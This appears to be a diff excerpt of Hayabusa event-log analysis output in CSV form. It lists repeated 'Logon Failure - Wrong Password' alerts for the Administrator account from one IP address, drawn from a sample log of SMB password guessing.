+2016-09-20 01:51:15.788 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JCFPSQmywelTXg74 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.832 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jCqb6TVV14hVX3NY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.888 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3qJsJrxVARedOdd3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.936 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s7iNkrkBNEbXPK0B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.975 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bio4zciNRolyeHc1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.026 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IFf1vN5MgAIsdZvx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.072 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zWhgUQSWAycVdYoS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ugHUJZuKHYfUHXWS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AUeUmYa72BzHfyhK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ksydur7W1mUoOZAE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.261 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YNIzopnsXH6OjcUs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.296 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SQljJkaWs8bcaOI1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1jejn6ZMo564m7ok | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.440 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KrpBO1SCHpt27CRM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ifPePsozBYRLCU3k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.521 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vve4r8QwaMLKrrcX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.569 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i9ArElR5k8yLefWu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4a1Y126C516BaGcz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.652 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VL7PnrO2dLsEbebQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.686 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GGTlLZ8J9f2PtiuL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6sVwPFs7bhJgJwRt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.772 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dgQNHL9etdHdRw9Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mjZrWpJlN2CwbxFc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.858 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 72lmrp6neWGKAURB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.896 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CnTi5dgoWunYutJ9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.936 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Vi2fTl07llsJEYyt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.980 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Hohh8KS1eYtojEya | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.020 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RsuC8F95UmsOSKvs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.064 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: be8UJ0EN7XS5r0b6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CgJlVYanwWKAhJ7O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zthqCIkr1nKtqcCj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.200 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tzmi8I402j71q5Wg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.244 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m0U3NYl8QEbgeJry | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.277 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uJJ1FOUIBInGkKPQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.316 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bu0X5RisszAHEs0X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.370 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5ZZfs8zqT2bLOAHq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.409 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qkpO31LzJfaYLyjB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.461 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BJrIsRTWUwPuySR7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.503 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VHNccqtwl9Y9IhLq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.536 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: APlvDcMzvms0gehT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.585 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AxOERGKI75RarVNZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uvzwd5qqC7og49yW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.662 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lksm3o2g0YhFnm4Z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zwXhSPCV4qHVF9Rc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: z31baZ4G36idFMeX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.784 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WK63qylKunHZB3zS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.816 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ALJxKGwyZz7JDpRg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.862 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q8tioTO3TEIzdzY0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.905 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5dIKTgQkvPKzKJoZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.947 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ta0IMrlArbgONhDG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.985 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MKNUu4624Rvr87kK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.032 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n7jIL2FkXzWqvWTJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.076 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oJMVh1zdQt7EikVj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.113 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5OqvximSAPlXZ3An | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.160 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tr2GQ1F3jccpWrsm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.209 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CCmbvQXXXzhHOdMG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qTp1BwPv8XiK2mrG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rnb19AXxM5ArcLxX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.359 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EUS5CKq2W1rkq46d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FzKSUVdsC5eENWDd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.434 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QFL07Mhy4iw5psBq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.486 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cMpitnzLXDLSXL73 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.584 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RSfaPdcsiRQoGYYm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.616 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PJRP4bS9Qgg06Z5P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.679 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3Z4veMNKngHUDoRf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MmF0YFgAMSRotb1y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DmrbO3dZw46DgmZQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.805 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Qg4CMwLpfzLrvDPj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.850 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BKDKUXNNhuSqRiTE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cBocrjNXjmuPCKRJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.924 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: loCrAXibgVxcOtCM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.966 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mZ7pHOJeOExrON2E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.006 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MeucKpaodpmdsqhD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LRlmBeBlV6n4MQyo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
